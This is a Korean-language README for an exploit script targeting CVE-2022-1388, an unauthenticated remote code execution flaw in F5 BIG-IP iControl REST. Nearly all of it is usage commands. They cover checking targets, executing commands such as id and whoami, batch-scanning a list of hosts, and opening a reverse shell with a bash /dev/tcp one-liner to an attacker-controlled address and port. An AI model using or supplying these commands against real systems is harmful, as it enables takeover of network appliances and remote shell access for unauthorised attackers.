
CVE-2022-1388 F5 BIG-IP iControl REST RCE
이 취약점으로 인해 관리 포트 및/또는 셀프 IP 주소를 통해 BIG-IP 시스템에 네트워크 접근이 가능한 인증되지 않은 공격자가 임의의 시스템 명령을 실행하거나, 파일을 생성/삭제하거나, 서비스를 비활성화할 수 있습니다.
기본 사용법
python3 CVE_2022_1388.py

취약점 확인
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

명령 실행:
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

배치 스캔
python3 CVE_2022_1388.py -s true -f check.txt

리버스 쉘
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

